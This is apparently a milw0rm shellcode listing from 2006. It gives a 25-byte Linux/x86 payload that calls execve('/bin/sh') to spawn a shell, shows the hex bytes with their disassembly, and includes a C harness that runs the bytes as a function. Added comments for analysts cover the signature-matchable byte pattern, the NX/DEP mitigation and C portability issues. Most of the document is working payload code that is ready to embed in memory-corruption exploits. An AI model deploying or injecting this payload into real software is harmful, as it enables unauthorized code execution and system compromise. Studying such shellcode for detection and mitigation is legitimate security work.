
Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) - 25 bytes

   /*
    * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL])
    * - 25 bytes
    * - xgc@gotfault.net
    *
    */
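   /*
    * Linux/i386 payload: 25 code bytes, plus the NUL that the string literal
    * appends. Per the AT&T-syntax disassembly on each line, the code builds
    * the path "/bin//sh" and a two-entry argv on the stack, then issues
    * execve(path, argv, NULL) through the int $0x80 syscall gate.
    *
    * Notes for analysts:
    *  - No byte is 0x00, so strlen() on this array reports all 25 bytes.
    *  - The two 4-byte pushes embed the ASCII text "//sh" and "/bin". That
    *    fixed byte run, together with the trailing "\xcd\x80", is the kind
    *    of constant pattern content signatures can match on.
    *  - int $0x80 with 32-bit registers is the i386 syscall convention; the
    *    bytes are not meaningful as a 64-bit syscall sequence.
    *
    * The page-gutter line numbers that were fused into each source line have
    * been dropped so that the declaration is valid C again.
    */
   char shellcode[] =
       "\x31\xc0"               // xor     %eax, %eax      eax = 0
       "\x50"                   // push    %eax            NUL terminator for the path
       "\x68\x2f\x2f\x73\x68"   // push    $0x68732f2f     "//sh" (doubled '/' pads to 8 bytes)
       "\x68\x2f\x62\x69\x6e"   // push    $0x6e69622f     "/bin"
       "\x89\xe3"               // mov     %esp, %ebx      ebx = path pointer
       "\x50"                   // push    %eax            argv[1] = NULL
       "\x53"                   // push    %ebx            argv[0] = path
       "\x89\xe1"               // mov     %esp, %ecx      ecx = argv
       "\x31\xd2"               // xor     %edx, %edx      edx = envp = NULL
       "\xb0\x0b"               // mov     $0xb, %al       eax = 11 (execve on i386)
       "\xcd\x80";              // int     $0x80           enter the kernel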
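   /*
    * Test harness: prints the payload length, then calls the byte array as if
    * it were a function.
    *
    * Caveats:
    *  - shellcode[] is an ordinary initialized, writable array, so the call
    *    only reaches the bytes if the platform lets data pages execute. Where
    *    non-executable data (NX/DEP, W^X) is enforced, the call faults
    *    instead; that fault is the mitigation working as intended.
    *  - Converting an object pointer to a function pointer is not defined by
    *    ISO C; it relies on the compiler accepting it as an extension.
    *  - NOTE(review): the listing uses printf() and strlen() without showing
    *    <stdio.h> or <string.h>; a C99-or-later compiler will warn about or
    *    reject the implicit declarations.
    *
    * Returns 0 if the call ever comes back. A successful execve replaces the
    * process image, so that line is normally not reached.
    */
   int main(void) {
       int (*f)() = (int (*)())shellcode;

       // strlen() yields a size_t, and passing a size_t for %u is a
       // format/argument mismatch. Cast so the argument really is unsigned int.
       printf("Length: %u\n", (unsigned)strlen(shellcode));

       f();
       return 0;
   }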
   // milw0rm.com [2006-04-03]




Gotfault Security                                                                   04/03/2006

				